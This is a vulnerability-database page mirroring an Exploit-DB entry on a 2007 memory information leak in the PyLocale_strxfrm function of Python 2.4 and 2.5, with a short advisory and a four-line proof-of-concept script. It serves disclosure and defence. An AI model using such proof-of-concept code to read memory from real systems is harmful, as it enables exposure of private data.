Lucene search
+L

Python 2.5 - 'PyLocale_strxfrm' Remote Information Leak

🗓️ 08 May 2007 00:00:00Reported by Piotr EngelkingType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 43 Views

Python 2.5 'PyLocale_strxfrm' Remote Information Lea

Related
Code
source: https://www.securityfocus.com/bid/23887/info

Python applications that use the 'PyLocale_strxfrm' function are prone to an information leak.

Exploiting this issue allows remote attackers to read portions of memory.

Python 2.4.4-2 and 2.5 are confirmed vulnerable.

#!/usr/bin/python

import locale

print locale.setlocale(locale.LC_COLLATE, 'pl_PL.UTF8')
print repr(locale.strxfrm('a'))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Dec 2013 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 25
EPSS0.12479
43